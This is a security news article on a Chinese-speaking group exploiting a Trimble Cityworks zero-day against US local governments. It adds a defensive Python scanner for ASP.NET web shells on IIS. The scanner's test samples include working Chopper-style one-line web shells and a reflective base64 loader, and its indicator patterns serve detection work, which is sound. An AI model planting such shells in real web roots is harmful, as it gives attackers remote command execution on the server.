Cisco's Talos threat intelligence team uncovered a campaign by UAT-6382, a threat group it assesses to be Chinese-speaking, that exploited a vulnerability in Trimble Cityworks as a zero-day, before the vendor had published a fix. Cityworks is an asset and work-order management platform widely used by local governments and utilities. The flaw, tracked as CVE-2025-0994, is a deserialization of untrusted data bug that lets an authenticated user achieve remote code execution on the Microsoft IIS web server hosting the application.
The intrusions reportedly began in January 2025, weeks before Trimble released fixed builds in early February (Cityworks 15.8.9, and 23.10 for the office companion line).
Talos researchers said the attackers broke into US local government networks, conducted reconnaissance, searched for sensitive files, and deployed malware for persistent access. Their primary interest appeared to be systems tied to utility management.
The intruders used a mix of tooling: the Chinese-language web shells AntSword and Chopper, together with TetraLoader, a custom loader written in Rust.
TetraLoader, built with the MaLoader framework, was used to stage known offensive tooling, Cobalt Strike and VShell, for ongoing access. MaLoader itself appeared on GitHub in late 2024, a sign of active custom-malware development in Chinese-speaking threat communities.
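A check a defender on an IIS host would want after reading this: a scan of the web root for the indicator shapes of Chopper- and AntSword-style ASP.NET web shells. The following is an added example, not code from Talos, Cisco or Trimble; the patterns are generic web shell heuristics (eval over request data, reflective loading of a base64 blob, process spawning), not signatures for UAT-6382's specific files, and the sample pages it scans are constructed for the demonstration. It assumes only that the site is an ordinary directory tree of .aspx/.ashx/.asmx/.asax files.

```python
"""Heuristic scan of an IIS web root for ASP.NET web shell indicators.

Added example: this is not code from the Talos report, Cisco or Trimble, and
the patterns are generic China Chopper / AntSword-style indicators (eval of a
request parameter, reflective assembly loading, process spawning), not
signatures for UAT-6382's specific files. All sample pages are constructed.
"""
import re
import tempfile
from pathlib import Path

# (indicator name, pattern) pairs matched against raw page source. Matching is
# case-insensitive because shell authors vary casing to defeat naive greps.
INDICATORS = [
    # Chopper/AntSword one-liner shape: eval(Request.Item["pw"], "unsafe")
    ("eval_on_request", re.compile(r"\beval\s*\(\s*Request\s*[.\[]", re.I)),
    # Stage-2 loaders: decode an attacker-supplied blob and load it as an assembly
    ("reflective_load", re.compile(r"\bAssembly\.Load\s*\(", re.I)),
    ("base64_decode", re.compile(r"\bFromBase64String\s*\(", re.I)),
    # Direct command execution from a page or handler
    ("process_start", re.compile(r"\bProcess\.Start\s*\(|\bProcessStartInfo\b", re.I)),
    # JScript.NET pages are rare in modern apps but standard in Chopper shells
    ("jscript_page", re.compile(r'Language\s*=\s*"?JScript"?', re.I)),
]

WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax"}


def scan_source(text: str) -> list[str]:
    """Return the names of all indicators present in one page's source."""
    return [name for name, pattern in INDICATORS if pattern.search(text)]


def classify(hits: list[str]) -> str:
    """Turn indicator hits into a verdict.

    eval over request data is a shell by itself; reflective loading of a
    base64 blob is the loader pattern; anything else that hit is worth a look.
    """
    if "eval_on_request" in hits or {"reflective_load", "base64_decode"} <= set(hits):
        return "webshell"
    return "suspicious" if hits else "clean"


def scan_tree(root: Path) -> dict[str, tuple[str, list[str]]]:
    """Scan every ASP.NET page under root; map relative path -> (verdict, hits)."""
    results = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        hits = scan_source(text)
        results[path.relative_to(root).as_posix()] = (classify(hits), hits)
    return results


# Constructed samples standing in for files found in a web root.
SAMPLES = {
    # Classic Chopper-style one-liner (the same shape AntSword's ASPX shell uses)
    "chopper.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    # Reflective loader: base64 payload from the request, loaded as an assembly
    "loader.aspx": (
        '<%@ Page Language="C#" %><%@ Import Namespace="System.Reflection" %>'
        '<% Assembly.Load(Convert.FromBase64String(Request["d"])).CreateInstance("U"); %>'
    ),
    # Legitimate-looking handler that spawns a process: flagged for review, not as a shell
    "diag.ashx": '<%@ WebHandler Language="C#" Class="Diag" %> ... System.Diagnostics.Process.Start("w32tm", "/query /status") ...',
    # Ordinary page with none of the indicators
    "default.aspx": '<%@ Page Language="C#" Inherits="WebApp.Default" %><html><body><% Response.Write("ok"); %></body></html>',
}


def demo() -> dict[str, tuple[str, list[str]]]:
    """Write the constructed samples to a temp dir and scan them like a web root."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, body in SAMPLES.items():
            (root / name).write_text(body, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for name, (verdict, hits) in sorted(demo().items()):
        print(f"{verdict:10} {name:14} {', '.join(hits) or '-'}")
```

Point `scan_tree` at the IIS site's physical path and review everything not marked clean. A content-only scan is a starting point, not a verdict: pair it with file modification times against the deployment baseline and with IIS access logs showing POST requests to the flagged pages, since a well-obfuscated shell can avoid all of these string patterns.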
Talos attributed the campaign to a Chinese-speaking actor based on its tooling, tradecraft and target selection. Because exploitation began before a fix existed, patching alone does not clear an affected organization: any Cityworks instance exposed in January may already have been compromised, and instances left unpatched after February remained open to the same intrusion. CISA's addition of CVE-2025-0994 to its Known Exploited Vulnerabilities catalog shortly after the patch underlined the point. The campaign reflects a broader pattern of reaching public utilities through widely deployed vendor software in the public sector, compounded by slow patch adoption.